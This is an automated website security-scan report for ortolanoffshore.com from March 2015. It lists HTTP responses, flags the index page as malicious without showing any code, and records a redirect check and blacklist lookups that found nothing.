Scanned pages/files
Request | Server response | Status |
http://ortolanoffshore.com/ | HTTP/1.1 200 OK Connection: close Date: Tue, 03 Mar 2015 20:03:13 GMT Accept-Ranges: bytes ETag: "2f51478349ce1:166310" Server: Microsoft-IIS/6.0 Content-Length: 4445 Content-Location: http://ortolanoffshore.com/index.html Content-Type: text/html Last-Modified: Sat, 04 May 2013 20:10:48 GMT Set-Cookie: X-Mapping-hnoldlfm=E608838851152B46B77F3FD714EF9193; path=/ X-Powered-By: ASP.NET | clean |
http://ortolanoffshore.com/index.html | 200 OK Content-Length: 4445 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below)
Antivirus reports:
http://ortolanoffshore.com/test404page.js | 404 Not Found Content-Length: 1635 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ortolanoffshore.com
Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 Mar 2015 20:03:13 GMT
Accept-Ranges: bytes
ETag: "2f51478349ce1:166310"
Server: Microsoft-IIS/6.0
Content-Length: 4445
Content-Location: http://ortolanoffshore.com/index.html
Content-Type: text/html
Last-Modified: Sat, 04 May 2013 20:10:48 GMT
Set-Cookie: X-Mapping-hnoldlfm=E608838851152B46B77F3FD714EF9193; path=/
X-Powered-By: ASP.NET
...4445 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: ortolanoffshore.com
Referer: http://www.google.com/search?q=ortolanoffshore.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ortolanoffshore.com
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://ortolanoffshore.com/
Result: ortolanoffshore.com is not infected or malware details are not published yet.